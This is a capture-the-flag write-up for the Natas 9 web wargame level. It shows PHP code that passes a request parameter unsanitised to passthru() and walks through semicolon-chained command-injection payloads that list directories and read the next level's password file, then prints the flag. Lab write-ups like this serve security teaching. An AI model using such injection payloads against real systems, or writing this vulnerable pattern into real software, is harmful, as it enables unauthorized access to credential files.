Problem 
We arrive at a webpage that searches for a needle.
Solution 
Let’s take a look at the source code.
Full PHP Code Snippet
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
passthru("grep -i $key dictionary.txt");
}
?>
We can see a dangerous function passthru(), after a bit googling we know this PHP code is vulnerable to Command Injection. So let’s look at the command being run by the shell when we give it a legitimate request, let’s say we give it the string test.
grep -i test dictionary.txt
We can see it’s actually being run, so let’s give it:
test; pwd; ls;
So passthru() will get the parameter:
grep -i test; pwd; ls; dictionary.txt
Now the shell will try to run 4 commands, separated by ;, which are:
-
grep -i test-
grepwithout an input file will look for the pattern (which in this case istest) from stdin, this should just get killed by the server.
-
pwdls-
dictionary.txt- the shell will try to interpret this as a command name, so it’ll just fail to do so.
Now we can see the output of pwd and ls, let’s go to the root dir and look for the password from there. We’ll change the payload into:
test; cd /; ls;
Then the shell will run:
grep -i test; cd /; ls; dictionary.txt
After remembering to look at the natas intro page, we know that the password is in /etc/natas_webpass/ so let’s go there instead.
test; cd /etc/natas_webpass/; ls;
Then the shell will run:
grep -i test; cd /etc/natas_webpass/; ls; dictionary.txt
We see that our password file is here, so let’s just cat our password file with the payload:
test; cd /etc/natas_webpass/; cat natas10;
Then the shell will run:
grep -i test; cd /etc/natas_webpass/; cat natas10; dictionary.txt
Flag 
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
Takeaway 
- Try to google “
vulnerability" when facing a new function
| ‹ Previous in Web exploitation: Natas8 | Next in Web exploitation: Natas10 › |